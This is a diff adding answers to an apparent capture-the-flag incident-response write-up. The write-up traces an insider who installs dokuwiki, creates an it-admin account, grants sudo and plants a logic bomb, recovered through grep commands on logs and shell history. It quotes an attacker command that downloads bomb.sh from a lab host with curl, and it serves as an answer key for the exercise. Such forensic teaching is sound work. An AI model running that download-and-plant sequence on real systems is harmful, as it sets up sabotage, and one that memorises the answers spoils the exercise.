andre5Jr/soc-analyst-Digital-Forensics-And-Incident-Response-Disgruntled/README.md

 grep sudo /var/log/auth.log | grep install
 Extract full command.

-🔱 Answer:
+🔱 Answer: /usr/bin/apt install dokuwiki

-✏️ Task 2: Identify Working Directory
+✏️ Task 2: What was the present working directory (PWD) when the previous command was run?

 ⭕️ Objective: Determine what directory the install command was run from.

 ⭕️ Method: The same auth log entry includes a PWD field.

-🔱 Answer:
+🔱 Answer: /home/cybert

-✏️ Task 3: Detect New User Creation
+✏️ Task 3: Which user was created after the package from the previous task was installed?

 ⭕️ Objective: Find the first user account added post-install.

 ⭕️ Method:
 grep sudo /var/log/auth.log | grep adduser

-🔱 Answer:
+🔱 Answer: it-admin

-✏️ Task 4: Find Sudo Privilege Grant
+✏️ Task 4: A user was then later given sudo priveleges.
+When was the sudoers file updated?
+(Format: Month Day HH:MM:SS)

 ⭕️ Objective: Determine when sudo privileges were added to the new user.

 ⭕️ Method:
 grep sudo /var/log/auth.log | grep visudo

-🔱 Answer:
+🔱 Answer: Dec 28 06:27:34

-✏️ Task 5: Detect Script Creation
+✏️ Task 5: A script file was opened using the "vi" text editor.
+What is the name of this file?

 ⭕️ Objective: Name the script file opened with vi.

 ⭕️ Method:
 grep sudo /var/log/auth.log | grep vi

-🔱 Answer:
+🔱 Answer: bomb.sh

-✏️ Task 6: Locate Script Download Command
+✏️ Task 6: What is the command used that created the file bomb.sh?

 ⭕️ Objective: Identify how the script was created (downloaded).

 ⭕️ Method:
 cat /home/it‑admin/.bash_history | grep curl

-🔱 Answer:
+🔱 Answer: curl 10.10.158.38:8080/bomb.sh --output bomb.sh

-✏️ Task 7: Track Script Movement
+✏️ Task 7: The file was renamed and moved to a different directory.
+What is the full path of this file now?

 ⭕️ Objective: Determine where and under what name the script was saved.

 ⭕️ Method:
 cat /home/it‑admin/.viminfo | grep saveas

-🔱 Answer:
+🔱 Answer: /bin/os-update.sh

-✏️ Task 8: File Modification Timestamp
+✏️ Task 8: When was the file from the previous question last modified?
+(Format: Month Day HH:MM)

 ⭕️ Objective: Find when the renamed script was last modified.

 ⭕️ Method:
 ls -la /bin | grep os-update.sh

-🔱 Answer:
+🔱 Answer: Dec 28 06:29

-✏️ Task 9: Identify Payload Outcome
+✏️ Task 9: What is the name of the file that will get created when the file from the first question executes?

 ⭕️ Objective: Name the file created by the logic bomb.

 ⭕️ Method:
 cat /bin/os-update.sh

-🔱 Answer:
+🔱 Answer: goodbye.txt

-✏️ Task 10: Determine Scheduled Execution Time
+✏️ Task 10: At what time will the malicious file trigger?
+(Format: HH:MM AM/PM)

 ⭕️ Objective: Discover when the malicious script is set to execute.